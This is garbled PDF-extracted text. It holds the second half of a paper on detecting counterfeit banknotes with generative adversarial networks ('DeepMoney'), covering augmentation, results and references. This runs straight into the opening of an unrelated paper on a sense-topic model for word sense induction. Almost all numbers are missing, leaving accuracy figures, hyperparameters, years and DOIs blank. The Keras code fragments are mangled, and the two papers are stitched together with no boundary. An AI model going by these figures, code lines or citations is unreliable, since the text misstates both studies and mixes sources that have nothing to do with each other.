/peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure deepmoney currency bill verification components. full-size doi: . /peerjcs. /fig- different components have been built to perform the verification of the currency note. figure shows the basic structure of the deepmoney architecture, its actors, and the way they interact with each other. there is a single actor here, which is shown as the user. the user can input an image and request the authentication of the currency note. the system will respond through various other functions, as shown in fig. . external systems may be used to receive assistance from the sensors if necessary. as deepmoney progresses, other more appropriate features may be found and the use of these initial features may be minimized and other more versatile features may evolve. in this case, the ‘input image’ will remain the same but the dependent functionalities may change. data preparation and augmentation data collection and its preprocessing is carried out before training neural networks or deep learning models for subsequent recognition tasks. the following subsections provide the necessary details of how data is prepared and augmented with image datasets through the following function: datagen = imagedatagenerator() taking pictures and building a dataset is a laborious and time consuming task. an api specially designed for creating augmented image data is used which takes less time to augment the data and reduces memory overhead. imagedatagenerator augments the data and when data has been created and configured then it is time to fit the data by calling the fit() function. once the function is called on the data generator it is then passed in the training dataset. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure input image. full-size doi: . /peerjcs. /fig- datagen:fit(train) data generator is an iterator and it returns the batches of image back when they have been requested. xbatch;ybatch=datagen : flow(train;train;batchsize= ) finally, fitgenerator() is called with arguments of the desired length of epochs on which to train the data. the other one is the data generator. fitgenerator (datagen; samplesperepoch= len (train) ; epochs= ) there are many ways to configure the data preparation and its augmentation. these include, feature-wise standardization, zca whitening, random rotation, shifts, shear and ips, dimension reordering, saving augmented images to disk. all the functions/augmentation are performed by calling the imagedatagenerator function. as a result of providing the input image as depicted in fig. , the function imagedatagenerator produces augmented data through incorporating the aforementioned features as shown in fig. . experimental setup the experiments are carried out on a gpu machine in fast university with the following configuration. keras is configured with theano as backend. from the keras library, the packages, dense, dropout, activation, and flatten layers are imported. the dense layer is used to define filters with model parameters to identify various features of the currency notes. the dropout layer is used to address overfitting and in order to ignore some of the features which are not contributing in identifying the actual features of the notes. the activation function, ‘‘relu’’ is used in order to represent the learned information in ranges of and . the number of epochs and batch size is set to and , respectively. to use the imagedatagenerator function, keras was utilized beside configuring scipy, numpy, h py and pyyaml. furthermore, a number of parameters were set for achieving augmentation which included: samplewise center, featurewise std normalization, zca pesilon, zca whitening, rotation range, width shift range, height shift range, shear range, zoom range, channel shift, horizontal, vertical, and rescale. these are set to either, , or in float values for the required changes. after specifying the parameters and storing the same in a datagen variable, the images were imported. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure output images. full-size doi: . /peerjcs. /fig- as specified by the iterations, images of the bank note with changes that were specified in the datagen will be produced and will be stored in the folder called preview. implementation comprehensive details are provided as to how the environment was set up for executing this project of gans on the dataset. the first step involved the setup and configuration of the requirements that would help to execute the code. after running certain required scripts, gan was trained on the deepmoney dataset. both the discriminator and the generator used a learning rate of . . the generator updated this twice for each update of the discriminator. this actually avoids the small discriminator loss. in the next step, results are produced and saved in png format. the class diagram in fig. represents the major classes of deepmoney. as can be seen, the main controller class is inputimage and every other class is developed from that class. inputimage reads an image and passes that image to one of those classes, or to multiple classes, according to the requirement. the respective classes will then call their functions that may call another function of different classes. the sequence diagram in fig. shows the functions and their activities after they have been executed. as discussed earlier, functions may or may not call other functions of ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure class diagram for deepmoney architecture. full-size doi: . /peerjcs. /fig- figure deepmoney sequence diagram. full-size doi: . /peerjcs. /fig- different classes if the task required is beyond their scope. the functions of other classes are called through instances of their respective class. the called function then returns the result to the parent function which, in turn, processes the user request. the algorithm for the gans is provided in fig. , while the algorithm for generating images is provide in fig. and the algorithm for augmentation is provided in fig. . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure algorithm for generating currency notes. full-size doi: . /peerjcs. /fig- figure algorithm for generating currency notes. full-size doi: . /peerjcs. /fig- figure algorithm for generating currency notes. full-size doi: . /peerjcs. /fig- results this section elaborates the results obtained through the experiments conducted on the deepmoney dataset as depicted in table . moreover, a model evaluation is presented with the confusion matrix, supervised loss function, the generator and discriminator respective losses and finally the classification accuracy. area under the curve (auc) the trained model was able to achieve % accuracy in correctly classifying data. the area under the curve (auc)/receiver operating characteristic (roc) is presented in fig. . confusion matrix the confusion matrix consists of three classes along the x and y axis. each row of the matrix represents each class along with the y-axis which shows its comparison with all the remaining classes. the classes belong to the deepmoney dataset having images of rs. , ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table experimental results. no. of folds accuracy sensitivity specificity precision kappa f score roc/auc . % . . . . . . . % . . . . . . . % . . . . . . figure deepmoney area under curve. full-size doi: . /peerjcs. /fig- rs. , and rs. . each class is assigned a unique density color. high intensity shades represent no confusion between classes while the lower intensity band represents confusion rates between the classes. in fig. the diagonal showing ′s indicate that the confusion matrix calculation is near perfection. supervised loss cross-entropy was minimized for the multi-class softmax and for that purpose the labels were adjusted. a label mask in code was used to ignore the images that are unlabeled for the ss-learning problem. the tensorflow graph visualization for the (percentage vs no. epochs) are shown in figs. – . total discriminator loss (td loss) using the objective function of gans, the total discriminator loss (td-loss) is brought down to . . this helped to make the discriminator more efficient in classification. the tensorflow graph visualization below is pitted against (percentageloss no. epochs) in fig. . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure confusion matrix calculation. full-size doi: . /peerjcs. /fig- figure discriminator loss graph visualization. full-size doi: . /peerjcs. /fig- ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure generator loss graph visualization. full-size doi: . /peerjcs. /fig- figure classification accuracy graph visualization. full-size doi: . /peerjcs. /fig- generator loss (g loss) using the objective function of gans, the generator’s loss (g loss) was brought up to ( . ), which can be seen in fig. . this helped to make the generator more robust in training the discriminator. the tensorflow graph visualization is visualised against (percentage-loss vs no. epochs). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. classification accuracy the discriminator is trained to classify the unseen images and the efficiency of the same is measured in terms of correct classification. as can be seen in fig. , a remarkable classification accuracy ( %) was achieved, which was made possible by training a discriminator through deepmoney dataset and generator images. the tensorflow graph visualization is depicted in fig. (percentage accuracy vs. no. epochs). conclusion implementation of gans models in the domain of computer vision has been proven to be effective. upon testing in the currency originality, the discriminator model is seen as a viable contender in the classifier area. additionally, classifier should be sufficiently trained with enough images by means of the real dataset and the generator module, especially in the semi supervised generative adversarial networks (ssgans). the dataset alteration can be performed in various other parametric tweaking with the keras framework. % accuracy is achieved by the proposed gans framework for counterfeit money detection; however, there is still room for improvement. as new generative models are created in the machine learning domain, deepmoney can be tested upon these to achieve better and more effective results. multi-class classifiers can be made good enough to result in improved accuracy. classification is regarded to be at the forefront of machine learning, therefore, a better multi-class classifier would yield an even better retrospective score for the model. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • toqeer ali conceived and designed the experiments, contributed reagents/materials/- analysis tools, approved the final draft. • salman jan conceived and designed the experiments, performed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • ahmad alkhodre contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, proof-reading, other support. • mohammad nauman performed the experiments. • muhammad amin analyzed the data, performed the computation work. • muhammad shoaib siddiqui dataset and code. data availability the following information was supplied regarding data availability: ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ali, toqeer; jan, salman ( ): deepmoney: counterfeit money detection using generative adversarial networks. figshare. dataset. https://doi.org/ . /m .figshare. .v . references abburu v, gupta s, rimitha sr, mulimani m, koolagudi sg. . currency recogni- tion system using image processing. in: contemporary computing (ic ), tenth international conference on. piscataway: ieee, – . alicherry m. . verifying authenticity of currency and tracking duplicates. technical disclosure commons. available at https://www.tdcommons.org/cgi/viewcontent.cgi? article= &context=dpubs_series. bartkiewicz k, Černoch a, chimczak g, lemr k, miranowicz a, nori f. . exper- imental quantum forgery of quantum optical money. npj quantum information : – doi . /s - - -x. berenguel a, terrades or, lladós j, cañero c. . banknote counterfeit detection through background texture printing analysis. in: document analysis systems (das), th iapr workshop on. piscataway: ieee, – . chakraborty k, basumatary j, dasgupta d, kalita jc, mukherjee s. . recent developments in paper currency recognition system. international journal of research in engineering and technology : – doi . /ijret. . . choi w-j, min g-h, lee b-h, eom j-h, kim j-w. . counterfeit detection using characterization of safety feature on banknote with full-field optical co- herence tomography. journal of the optical society of korea ( ): – doi . /josk. . . . . derrida j. . given time: i. counterfeit money, volume . chicago: university of chicago press. goodfellow i, bengio y, courville a, bengio y. . deep learning, volume . cam- bridge: mit press. goodfellow i, pouget-abadie j, mirza m, xu b, warde-farley d, ozair s, courville a, bengio y. . generative adversarial nets. in: international conference on advances in neural information processing systems. cambridge: mit press, – . hassanpour h, farahabadi pm. . using hidden markov models for paper currency recognition. expert systems with applications ( ): – doi . /j.eswa. . . . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – doi . /neco. . . . . kang k, lee c. . fake banknote detection using multispectral images. in: informa- tion, intelligence, systems & applications (iisa), th international conference on. piscataway: ieee, – . kayani s. . a bank note processing system having a combined florescence and phosphorescence detection system. us patent , , . available at https://patents. justia.com/patent/ (accessed on february ). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v https://www.tdcommons.org/cgi/viewcontent.cgi?article= &context=dpubs_series https://www.tdcommons.org/cgi/viewcontent.cgi?article= &context=dpubs_series http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /ijret. . http://dx.doi.org/ . /josk. . . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /neco. . . . https://patents.justia.com/patent/ https://patents.justia.com/patent/ http://dx.doi.org/ . /peerj-cs. krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep con- volutional neural networks. in: advances in neural information processing systems. – . lee h, pham p, largman y, ng ay. . unsupervised feature learning for audio classification using convolutional deep belief networks. in: advances in neural information processing systems. – . magdaleno a. . woman pleads guilty for printing thousands of money as fake. mashable. available at http://on.mash.to/ luzvzv (accessed on january ). micali s, devadas s. . counterfeit prevention. us patent application / , (accessed on february ). mirza r, nanda v. a. design and implementation of indian paper currency authen- tication system based on feature extraction by edge based segmentation using sobel operator. international journal of engineering research and development ( ): – . mirza r, nanda v. b. paper currency verification system based on characteristic extraction using image processing. international journal of engineering and advanced technology (ijeat) ( ): – . mohamad ns, hussin b, shibghatullah as, basari a. . banknote authentication using artificial neural network. science international ( ): – . murakami-fester a. . counterfiet cases in us. usa today. available at https: //www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money- spot-fake/ / (accessed on january ). phillips r. . miniaturized counterfeit detector. us patent application / , . available at http://www.freepatentsonline.com/y / .html (accessed on february ). prasanthi bs, setty dr. . indian paper currency authentication system using image processing. international journal of research in engineering and technology : – . radford a, metz l, chintala s. . unsupervised representation learning with deep convolutional generative adversarial networks. arxiv preprint. arxiv: . . ross dj, elmenhurst bj, tocci m, forbes j, ross hw. . database for detecting counterfeit items using digital fingerprint records. us patent application / , . available at https://patents.google.com/patent/us a /en (accessed on february ). sak h, senior a, beaufays f. . long short-term memory recurrent neural network architectures for large scale acoustic modeling. in: fifteenth annual conference of the international speech communication association. salimans t, goodfellow i, zaremba w, cheung v, radford a, chen x. . improved techniques for training gans. in: advances in neural information processing systems. – . shoaib m, ilyas m, khiyal m, hayat s. . official digital currency. in: digital infor- mation management (icdim), eighth international conference on. piscataway: ieee, – . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://on.mash.to/ luzvzv https://www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money-spot-fake/ / https://www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money-spot-fake/ / https://www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money-spot-fake/ / http://www.freepatentsonline.com/y / .html http://arxiv.org/abs/ . https://patents.google.com/patent/us a /en http://dx.doi.org/ . /peerj-cs. singh m, ozarde p, abhiram k. . image processing based detection of counterfeit indian bank notes. in: th international conference on computing, communication and networking technologies. – . snehlata , saxena v. . identification of fake currency: a case study of indian sce- nario. international journal of advanced research in computer science ( ): – . taillard m. . counterfeiting. in: economics and modern warfare. new york: palgrave macmillan, – . tanaka t, nishiyama s, koyama m. . method for making an anti-counterfeit latent image formation object for bills, credit cards, etc. us patent a issued december , . available at https://patents.google.com/patent/us a/en. thakur m, kaur a. . various fake currency detection techniques. international journal for technological research in engineering ( ): – . warrington e, baddeley a. . amnesia and the distinction between long-and short- term memory . in: exploring working memory. new york: routledge, – . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://patents.google.com/patent/us a/en http://dx.doi.org/ . /peerj-cs. a sense-topic model for word sense induction with unsupervised data enrichment jing wang∗ mohit bansal† kevin gimpel† brian d. ziebart∗ clement t. yu∗ ∗university of illinois at chicago, chicago, il, , usa {jwang ,bziebart,cyu}@uic.edu †toyota technological institute at chicago, chicago, il, , usa {mbansal,kgimpel}@ttic.edu abstract word sense induction (wsi) seeks to automat- ically discover the senses of a word in a cor- pus via unsupervised methods. we propose a sense-topic model for wsi, which treats sense and topic as two separate latent vari- ables to be inferred jointly. topics are in- formed by the entire document, while senses are informed by the local context surrounding the ambiguous word. we also discuss unsu- pervised ways of enriching the original cor- pus in order to improve model performance, including using neural word embeddings and external corpora to expand the context of each data instance. we demonstrate significant im- provements over the previous state-of-the-art, achieving the best results reported to date on the semeval- wsi task. introduction word sense induction (wsi) is the task of automat- ically discovering all senses of an ambiguous word in a corpus. the inputs to wsi are instances of the ambiguous word with its surrounding context. the output is a grouping of these instances into clusters corresponding to the induced senses. wsi is gen- erally conducted as an unsupervised learning task, relying on the assumption that the surrounding con- text of a word indicates its meaning. most previous work assumed that each instance is best labeled with a single sense, and therefore, that each instance be- longs to exactly one sense cluster. however, recent work (erk and mccarthy, ; jurgens, ) has shown that more than one sense can be used to inter- pret certain instances, due to context ambiguity and sense relatedness. to handle these characteristics of wsi (unsuper- vised, senses represented by token clusters, multiple senses per instance), we consider approaches based on topic models. a topic model is an unsupervised method that discovers the semantic topics underly- ing a collection of documents. the most popular is latent dirichlet allocation (lda; blei et al., ), in which each topic is represented as a multinomial distribution over words, and each document is rep- resented as a multinomial distribution over topics. one approach would be to run lda on the in- stances for an ambiguous word, then simply inter- pret topics as induced senses (brody and lapata, ). however, while sense and topic are related, they are distinct linguistic phenomena. topics are assigned to entire documents and are expressed by all word tokens, while senses relate to a single am- biguous word and are expressed through the local context of that word. one possible approach would be to only keep the local context of each ambigu- ous word, discarding the global context. however, the topical information contained in the broader con- text, though it may not determine the sense directly, might still be useful for narrowing down the likely senses of the ambiguous word. consider the ambiguous word cold. in the sen- tence “his reaction to the experiments was cold”, the possible senses for cold include cold tempera- ture, a cold sensation, common cold, or a negative emotional reaction. however, if we know that the topic of the document concerns the effects of low temperatures on physical health, then the negative emotional reaction sense should become less likely. therefore, in this case, knowing the topic helps nar- row down the set of plausible senses. transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / ; revision batch / ; revision batch / ; published / . c© association for computational linguistics. at the same time, knowing the sense can also help determine possible topics. consider a set of texts that all include the word cold. without further in- formation, the texts might discuss any of a number of possible topics. however, if the sense of cold is that of cold ischemia, then the most probable topics would be those related to organ transplantation. in this paper, we propose a sense-topic model for wsi, which treats sense and topic as two separate latent variables to be inferred jointly (§ ). when re- lating the sense and topic variables, a bidirectional edge is drawn between them to represent their cyclic dependence (heckerman et al., ). we perform inference using collapsed gibbs sampling (§ . ), then estimate the sense distribution for each instance as the solution to the wsi task. we conduct exper- iments on the semeval- task wsi dataset, showing improvements over several strong baselines and task systems (§ ). we also present unsupervised ways of enriching our dataset, including using neural word embed- dings (mikolov et al., ) and external web-scale corpora to enrich the context of each data instance or to add more instances (§ ). each data enrich- ment method gives further gains, resulting in sig- nificant improvements over existing state-of-the-art wsi systems. overall, we find gains of up to % relative improvement in fuzzy b-cubed and % rel- ative improvement in fuzzy normalized mutual in- formation (jurgens and klapaftis, ). background and related work we discuss the wsi task, then discuss several areas of research that are related to our approach, includ- ing applications of topic modeling to wsi as well as other approaches that use word embeddings and clustering algorithms. wsd and wsi: wsi is related to but distinct from word sense disambiguation (wsd). wsd seeks to assign a particular sense label to each target word instance, where the sense labels are known and usually drawn from an existing sense inventory like wordnet (miller et al., ). al- though extensive research has been devoted to wsd, wsi may be more useful for downstream tasks. wsd relies on sense inventories whose construc- tion is time-intensive, expensive, and subject to poor inter-annotator agreement (passonneau et al., ). sense inventories also impose a fixed sense gran- ularity for each ambiguous word, which may not match the ideal granularity for the task of interest. finally, they may lack domain-specific senses and are difficult to adapt to low-resource domains or lan- guages. in contrast, senses induced by wsi are more likely to represent the task and domain of interest. researchers in machine translation and information retrieval have found that predefined senses are of- ten not well-suited for these tasks (voorhees, ; carpuat and wu, ), while induced senses can lead to improved performance (véronis, ; vick- rey et al., ; carpuat and wu, ). topic modeling for wsi: brody and lapata ( ) proposed a topic model that uses a weighted combination of separate lda models based on dif- ferent feature sets (e.g. word tokens, parts of speech, and dependency relations). they only used smaller units of text surrounding the ambiguous word, dis- carding the global context of each instance. yao and van durme ( ) proposed a model based on a hi- erarchical dirichlet process (hdp; teh et al., ), which has the advantage that it can automatically discover the number of senses. lau et al. ( ) de- scribed a model based on an hdp with positional word features; it formed the basis for their submis- sion (unimelb, lau et al., ) to the semeval- wsi task (jurgens and klapaftis, ). our sense-topic model is distinct from this prior work in that we model sense and topic as two sepa- rate latent variables and learn them jointly. we com- pare to the performance of unimelb in § . for word sense disambiguation, there also exist several approaches that use topic models (cai et al., ; boyd-graber and blei, ; boyd-graber et al., ; li et al., ); space does not permit a full discussion. word representations for wsi: another ap- proach to solving wsi is to use word representations built by distributional semantic models (dsms; sahlgren, ) or neural net language models (nnlms; bengio et al., ; mnih and hinton, ). their assumption is that words with similar distributions have similar meanings. akkaya et al. ( ) use word representations learned from dsms directly for wsi. each word is represented by a co- occurrence vector, and the meaning of an ambigu- ous word in a specific context is computed through element-wise multiplication applied to the vector of the target word and its surrounding words in the con- text. then instances are clustered by hierarchical clustering based on their representations. word representations trained by nnlms, often called word embeddings, capture information via training criteria based on predicting nearby words. they have been useful as features in many nlp tasks (turian et al., ; collobert et al., ; dhillon et al., ; hisamoto et al., ; bansal et al., ). the similarity between two words can be computed using cosine similarity of their embed- ding vectors. word embeddings are often also used to build representations for larger units of text, such as sentences, through vector operations (e.g., sum- mation) applied to the vector of each token in the sentence. in our work, we use word embeddings to compute word similarities (for better modeling of our data distribution), to represent sentences (to find similar sentences in external corpora for data enrich- ment), and in a product-of-embeddings baseline. baskaya et al. ( ) represent the context of each ambiguous word by using the most likely substitutes according to a -gram lm. they pair the ambigu- ous word with likely substitutes, project the pairs onto a sphere (maron et al., ), and obtain final senses via k-means clustering. we compare to their semeval- system ai-ku (§ ). other approaches to wsi: other approaches in- clude clustering algorithms to partition instances of an ambiguous word into sense-based clus- ters (schütze, ; pantel and lin, ; purandare and pedersen, ), or graph-based methods to in- duce senses (dorow and widdows, ; véronis, ; agirre and soroa, ). problem setting in this paper, we induce senses for a set of word types, which we refer to as target words. for each target word, we have a set of instances. each in- stance provides context for a single occurrence of the target word. for our experiments, we use the the target word token may occur multiple times in an in- stance, but only one occurrence is chosen as the target word occurrence. figure : proposed sense-topic model in plate notation. there are md instances for the given target word. in an instance, there are ng global context words (wg) and n` local context words (w`), all of which are observed. there is one latent variable (“topic” tg) for the wg and two latent variables (“topic” t` and “sense” s`) for the w`. each instance has topic mixing proportions θt and sense mixing proportions θs. for clarity, not all variables are shown. the complete figure with all variables is given in appendix a. this is a dependency network, not a di- rected graphical model, as shown by the directed arrows between t` and s`; see text for details. dataset released for semeval- task (jur- gens and klapaftis, ), collected from the open american national corpus (oanc; ide and suder- man, ). it includes target words: verbs, nouns, and adjectives. there are a total of , instances across all target words. each in- stance contains only one sentence, with a minimum length of and a maximum length of . the gold standard for the dataset was prepared by multiple annotators, where each annotator labeled instances based on the sense inventories in wordnet . . for each instance, they rated all senses of a target word on a likert scale from one to five. a sense-topic model for wsi we now present our sense-topic model, shown in plate notation in figure . it generates the words in the set of instances for a single target word; we run the model separately for each target word, sharing no parameters across target words. we treat sense and topic as two separate latent variables to be in- ferred jointly. to differentiate sense and topic, we use a window around the target word in each in- stance. word tokens inside the window are local “word sense induction for graded and non- graded senses,” http://www.cs.york.ac.uk/ semeval- /task http://www.cs.york.ac.uk/semeval- /task http://www.cs.york.ac.uk/semeval- /task context words (w`), while tokens outside the win- dow are global context words (wg). the number of words in the window is fixed to in all experiments ( words before the target word and after). generating global context words: as shown in the left part of figure , each global context word wg is generated from a latent topic variable tg for the instance, which follows the same generative story as lda. the corresponding probability of the ith global context word w(i)g within instance d is: pr(w(i)g |d,θt,ψt)= t∑ j= pψtj(w (i) g |t(i)g =j)pθt(t(i)g =j|d) ( ) where t is the number of topics, pψtj (w (i) g |t(i)g = j) is the multinomial distribution over words for topic j (parameterized by ψtj ) and pθt(t (i) g = j|d) is the multinomial distribution over topics for instance d (parameterized by θt). generating local context words: a local context word w` is generated from a topic variable t` and a sense variable s`: pr(w`|d,θt,ψt,θs,ψs,θs|t,θt|s,θst) = t∑ j= s∑ k= pr(w`|t` =j,s` =k) pr(t` =j,s` =k|d) ( ) where s is the number of senses, pr(w`|t` = j,s` = k) is the probability of generating word w` given topic j and sense k, and pr(t` = j,s` = k|d) is the joint probability over topics and senses for d. unlike in eq. ( ), we do not use multinomial parameterizations for the distributions in eq. ( ). when parameterizing them, we make several de- partures from purely-generative modeling. all our choices result in distributions over smaller event spaces and/or those that condition on fewer vari- ables. this helps to mitigate data sparsity is- sues arising from attempting to estimate high- dimensional distributions from small datasets. a secondary benefit is that we can avoid biases caused by particular choices of generative directionality in we use pr() for generic probability distributions without further qualifiers and pθ() for distributions parameterized by θ. for clarity, we drop the (i) superscripts in these and the following equations. the model. we later include an empirical compari- son to justify some of our modeling choices (§ ). first, when relating the sense and topic variables, we avoid making a single decision about generative dependence. taking inspiration from dependency networks (heckerman et al., ), we use the fol- lowing factorization: pr(t` = j,s` = k|d) = zd pr(s` = k|d,t` = j) pr(t` = j|d,s` = k) ( ) where zd is a normalization constant. we factorize further by using redundant proba- bilistic events, then ignore the normalization con- stants during learning, a concept commonly called deficiency (brown et al., ). deficient modeling has been found to be useful for a wide range of nlp tasks (klein and manning, ; may and knight, ; toutanova and johnson, ). in particular, we factor the conditional probabilities in eq. ( ) into products of multinomial probabilities: pr(s` = k|d,t` = j) = pθs(s` =k|d)pθs|tj(s` =k|t` =j)pθst(t` =j,s` =k) zd,tj pr(t` =j|d,s` =k)= pθt(t` =j|d)pθt|sk(t` =j|s` =k) zd,sk where zd,tj and zd,sk are normalization factors and we have introduced new multinomial parameters θs,θs|tj,θst, and θt|sk. we use the same idea to factor the word genera- tion distribution: pr(w`|t` =j,s` =k)= pψtj(w`|t` =j)pψsk(w`|s` =k) ztj,sk where ztj,sk is a normalization factor, and we have new multinomial parameters ψsk for the sense-word distributions. one advantage of this parameteriza- tion is that we naturally tie the topic-word distribu- tions across the global and local context words by using the same parameters ψtj . . generative story we now give the full generative story of our model. we describe it for generating a set of instances of size md, where all instances contain the same tar- get word. we use symmetric dirichlet priors for all multinomial distributions mentioned above, us- ing the same fixed hyperparameter value (α) for all. we use ψ to denote parameters of multinomial distributions over words, and θ to denote parame- ters of multinomial distributions over topics and/or senses. we leave unspecified the distributions over n` (number of local words in an instance) and ng (number of global words in an instance), as we only use our model to perform inference given fixed in- stances, not to generate new instances. the generative story first follows the steps de- scribed in algo. to generate parameters that are shared across all instances; then for each instance d, it follows algo. to generate global and local words. algorithm generative story for instance set : for each topic j ← to t do : choose topic-word params. ψtj ∼ dir(α) : choose topic-sense params. θs|tj ∼ dir(α) : for each sense k ← to s do : choose sense-word params. ψsk ∼ dir(α) : choose sense-topic params. θt|sk ∼ dir(α) : choose topic/sense params. θst ∼ dir(α) algorithm generative story for instance d : choose topic proportions θt ∼ dir(α) : choose sense proportions θs ∼ dir(α) : choose ng and n` from unspecified distributions : for i ← to ng do : choose a topic j ∼ mult(θt) : choose a word wg ∼ mult(ψtj ) : for i ← to n` do : repeat : choose a topic j ∼ mult(θt) : choose a sense k ∼ mult(θs) : choose a topic j′ ∼ mult(θt|sk) : choose a sense k′ ∼ mult(θs|tj ) : choose topic/sense 〈j′′,k′′〉∼ mult(θst) : until j = j′ = j′′ and k = k′ = k′′ : repeat : choose a word w` ∼ mult(ψtj ) : choose a word w′` ∼ mult(ψsk) : until w` = w′` . inference we use collapsed gibbs sampling (geman and ge- man, ) to obtain samples from the posterior dis- tribution over latent variables, with all multinomial parameters analytically integrated out before sam- pling. then we estimate the sense distribution θs for each instance using maximum likelihood estimation on the samples. these sense distributions are the output of our wsi system. we note that deficient modeling does not ordinar- ily affect gibbs sampling when used for computing posteriors over latent variables, as long as parame- ters (the θ and ψ) are kept fixed. this is the case during the e step of an em algorithm, which is the usual setting in which deficiency is used. only the m step is affected; it becomes an approximate m step by assuming the normalization constants equal (brown et al., ). however, here we use collapsed gibbs sampling for posterior inference, and the analytic integration is disrupted by the presence of the normalization constants. to bypass this, we employ the standard approximation of deficient models that all normal- ization constants are , permitting us to use stan- dard formulas for analytic integration of multino- mial parameters with dirichlet priors. empirically, we found this “collapsed deficient gibbs sampler” to slightly outperform a more principled approach based on em, presumably due to the ability of col- lapsing to accelerate mixing. during the sampling process, each sampler is run on the full set of instances for a target word, iterating through all word tokens in each instance. if the cur- rent word token is a global context word, we sample a new topic for it conditioned on all other latent vari- ables across instances. if the current word is a local context word, we sample a new topic/sense pair for it again conditioned on all other latent variable values. we write the conditional posterior distribution over topics for global context word token i in in- stance d as pr(t(i)g = j|d,t−i,s, ·), where t(i)g = j is the topic assignment of token i, d is the current instance, t−i is the set of topic assignments of all word tokens aside from i for instance d, s is the set of sense assignments for all local word tokens in instance d, and “·” stands for all other observed or known information, including all words, all dirich- let hyperparameters, and all latent variable assign- ments in other instances. the conditional posterior can be computed by: pr(t(i)g = j|d,t−i,s, ·) ∝ cdtdj + α∑t k= c dt dk + tα︸ ︷︷ ︸ pr(t=j|d,t−i,s,·) cwtij + α∑wt k′= c wt k′j + wtα︸ ︷︷ ︸ pr(w (i) g |t=j,t−i,s,·) ( ) where we use the superscript dt as a mnemonic for “instance/topic” when counting topic assignments in an instance and wt for “word/topic” when count- ing topic assignments for a word. cdtdj contains the number of times topic j is assigned to some word token in instance d, excluding the current word to- ken w(i)g ; cwtij is the number of times word w (i) g is assigned to topic j, across all instances, excluding the current word token. wt is the number of dis- tinct word types in the full set of instances. we show the corresponding conditional posterior probabilities underneath each term; the count ratios are obtained using standard dirichlet-multinomial collapsing. the conditional posterior distribution over topic/sense pairs for a local context word token w(i)` can be computed by: pr(t (i) ` = j,s (i) ` = k|d,t −i,s−i, ·) ∝ cdtdj + α∑t k′= c dt dk′ + tα︸ ︷︷ ︸ pr(t=j|d,t−i,s,·) cwtij + α∑wt k′= c wt k′j + wtα︸ ︷︷ ︸ pr(w (i) ` |t=j,t−i,s,·) cdsdk + α∑s k′= c ds dk′ + sα︸ ︷︷ ︸ pr(s=k|d,s−i,·) cwsik + α∑ws k′= c ws k′k + wsα︸ ︷︷ ︸ pr(w (i) ` |s=k,s−i,·) cstkj + α∑s k′= c st k′j + sα︸ ︷︷ ︸ pr(s=k|t=j,t−i,s−i,·) cstkj + α∑t k′= c st kk′ + tα︸ ︷︷ ︸ pr(t=j|s=k,t−i,s−i,·) cstkj + α∑s k′= ∑t j′= c st k′j′ + stα︸ ︷︷ ︸ pr(s=k,t=j|t−i,s−i,·) ( ) where cdsdk contains the number of times sense k is assigned to some local word token in instance d, ex- cluding the current word token; cwsik contains the number of time word w(i)` is assigned to sense k, ex- cluding the current time; cstkj contains the number of times sense k and topic j are assigned to some lo- cal word tokens. ws is the number of distinct local context word types across the collection. decoding after the sampling process, we obtain a fixed-point estimate of the sense distribution (θs) for each instance d using the counts from our samples. where we use θks to denote the probability of sense k for the instance, this amounts to: θks = cdsdk∑s k′= c ds dk′ ( ) this distribution is considered the final sense assign- ment distribution for the target word in instance d for the wsi task; the full distribution is fed to the eval- uation metrics defined in the next section. to inspect what the model learned, we similarly obtain the sense-word distribution (ψs) from the counts as follows, where ψisk is the probability of word type i given sense k: ψisk = cwsik∑ws i′= c ws i′k ( ) experimental results in this section, we evaluate our sense-topic model and compare it to several strong baselines and state- of-the-art systems. evaluation metrics to evaluate wsi systems, ju- rgens and klapaftis ( ) propose two metrics: fuzzy b-cubed and fuzzy normalized mutual infor- mation (nmi). they are each computed separately for each target word, then averaged across target words. fuzzy b-cubed prefers labeling all instances with the same sense, while fuzzy nmi prefers the opposite extreme of labeling all instances with dis- tinct senses. hence, we report both fuzzy b-cubed (%) and fuzzy nmi (%) in our evaluation. 